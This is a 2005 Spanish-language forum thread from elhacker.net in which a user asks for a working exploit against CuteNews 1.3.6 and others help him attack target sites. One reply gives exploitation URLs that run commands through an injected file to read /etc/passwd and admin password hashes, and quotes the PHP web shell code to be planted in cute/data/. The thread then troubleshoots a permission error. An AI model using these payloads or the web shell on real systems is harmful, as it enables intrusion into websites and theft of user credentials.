elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 09:25  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Cute News ?		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Cute News ?  (Leído 986 veces)
darksteel-

Desconectado Desconectado

Mensajes: 142


¡Amo YaBB SE!


Ver Perfil
Cute News ?
« en: 11 Octubre 2005, 20:34 »
 ;) ando buscando un exploit para el CuteNews 1.3.6
 probe ese pero no sirve...

http://milw0rm.com/id.php?id=1221
En línea
easycreations.org
-sagitari-


Desconectado Desconectado

Mensajes: 1.640


:D


Ver Perfil WWW
Re: Cute News ?
« Respuesta #1 en: 11 Octubre 2005, 20:44 »
buscaste en security focus y demás?
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Cute News ?
« Respuesta #2 en: 11 Octubre 2005, 20:51 »
tambien puedes usar esto:

http://[target]/[path]/cute/data/flood.db.php?cmd=cat%20/etc/passwd

para ver el archivo passwd

o

http://[target]/[path]/cute/data/flood.db.php?cmd=cat%20users.db.php

para ver hashes de la contraseña de cualquier admin/usuario

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
darksteel-

Desconectado Desconectado

Mensajes: 142


¡Amo YaBB SE!


Ver Perfil
Re: Cute News ?
« Respuesta #3 en: 11 Octubre 2005, 23:41 »
 :-[ You don't have permission to access /cute/data/ on this server.

No me da permisos por http para entrar a esa carpeta.
En línea
easycreations.org
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Cute News ?
« Respuesta #4 en: 11 Octubre 2005, 23:49 »
fijate en el exploit que posteaste, en el paso nº 2, la injeccion de la shell en cute/data/.

Código:
'<?php error_reporting(0);

system($HTTP_GET_VARS[cmd]);

?>';

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
darksteel-

Desconectado Desconectado

Mensajes: 142


¡Amo YaBB SE!


Ver Perfil
Re: Cute News ?
« Respuesta #5 en: 11 Octubre 2005, 23:54 »
por eos no sirve por que no tiene permisos.?
En línea
easycreations.org
darksteel-

Desconectado Desconectado

Mensajes: 142


¡Amo YaBB SE!


Ver Perfil
Re: Cute News ?
« Respuesta #6 en: 12 Octubre 2005, 01:02 »
otra pregunta, puedo tener acceso a ese file siendo admin del script?
En línea
easycreations.org
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines